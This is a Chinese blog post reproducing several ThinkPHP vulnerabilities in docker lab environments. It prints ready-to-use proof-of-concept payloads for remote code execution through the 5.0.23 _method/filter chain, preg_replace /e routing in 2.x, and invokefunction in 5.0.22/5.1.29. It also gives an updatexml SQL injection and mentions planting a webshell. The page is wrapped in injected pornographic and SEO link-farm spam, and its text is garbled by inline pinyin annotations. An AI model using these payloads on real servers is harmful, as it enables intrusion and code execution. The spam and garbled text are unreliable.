<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      Loading

      thinkphp 框架漏洞復(fù)現(xiàn)

      ThinkPHP5 5.0.23 遠(yuǎn)程代碼執(zhí)行漏洞

      漏洞搭建

      docker-compose up -d
      

      漏洞介紹

      ThinkPHP是一款運用極廣的PHP開發(fā)框架。其5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。

      漏洞復(fù)現(xiàn)

      • poc

        POST /index.php?s=captcha HTTP/1.1
        Host: 127.0.0.1:8080
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: settingStore=1630480512401_0
        Upgrade-Insecure-Requests: 1
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 73
        
        _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
        
      • 漏洞復(fù)習(xí)
        image

      • 寫shell,利用pwd出來的路徑寫入shell
        image

      ThinkPHP 2.x 任意代碼執(zhí)行漏洞

      漏洞介紹

      ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

      $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
      

      導(dǎo)致用戶的輸入?yún)?shù)被插入雙引號中執(zhí)行,造成任意代碼執(zhí)行漏洞。

      ThinkPHP 3.0版本因為Lite模式下沒有修復(fù)該漏洞,也存在這個漏洞。

      環(huán)境搭建

      執(zhí)行如下命令啟動ThinkPHP 2.1的Demo應(yīng)用:

      docker-compose up -d
      

      漏洞復(fù)現(xiàn)

      • poc
        http://127.0.0.1:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
      • 復(fù)現(xiàn)
        image

      ThinkPHP5 5.0.22/5.1.29 遠(yuǎn)程代碼執(zhí)行漏洞

      漏洞復(fù)現(xiàn)

      ThinkPHP是一款運用極廣的PHP開發(fā)框架。其版本5中,由于沒有正確處理控制器名,導(dǎo)致在網(wǎng)站沒有開啟強制路由的情況下(即默認(rèn)情況下)可以執(zhí)行任意方法,從而導(dǎo)致遠(yuǎn)程命令執(zhí)行漏洞。

      參考鏈接:

      漏洞環(huán)境

      運行ThinkPHP 5.0.20版本:

      docker-compose up -d
      

      漏洞復(fù)現(xiàn)

      • poc
        http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
      • 復(fù)現(xiàn)
        image

      ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

      運行環(huán)境:

      docker-compose up -d
      

      漏洞原理

      漏洞原理說明:

      漏洞利用

      • poc
        127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
      • 復(fù)現(xiàn)
        image
      • 信息泄漏
        image
      posted @ 2022-04-23 11:55  5rem  閱讀(537)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 噜噜噜亚洲色成人网站∨| 被拉到野外强要好爽| 骚虎三级在线免费播放| 成年女人片免费视频播放A| 亚洲五月天综合| 国产欧美日韩高清在线不卡| 精品无码一区在线观看| 国产欧美亚洲精品第一页在线| 图片区偷拍区小说区五月 | 精品人妻日韩中文字幕| 国产成人亚洲精品狼色在线| 大香网伊人久久综合网2020| 日本一区二区三区专线| 日韩美少妇大胆一区二区| 色综合AV综合无码综合网站| 国产欧美精品一区二区三区-老狼 真实单亲乱l仑对白视频 | 国产精品美女黑丝流水| 国产色a在线观看| 野外做受三级视频| 无码福利写真片视频在线播放| 九九综合va免费看| 亚洲精品熟女一区二区| 久久ww精品w免费人成| 中文字幕99国产精品| 亚洲精品一二三四区| 久久99久久99精品免观看| 景宁| 激情综合网激情激情五月天| 噜噜噜噜私人影院| 精品日韩人妻中文字幕| 四虎库影成人在线播放| 高清国产av一区二区三区| 亚洲精品97久久中文字幕无码 | 少妇午夜啪爽嗷嗷叫视频| 亚洲精品无码久久一线| 午夜福利看片在线观看| 国产日韩精品欧美一区喷水| 久久精品国产一区二区三| 午夜精品久久久久久久久| 夜夜夜高潮夜夜爽夜夜爰爰| 国产精品入口中文字幕|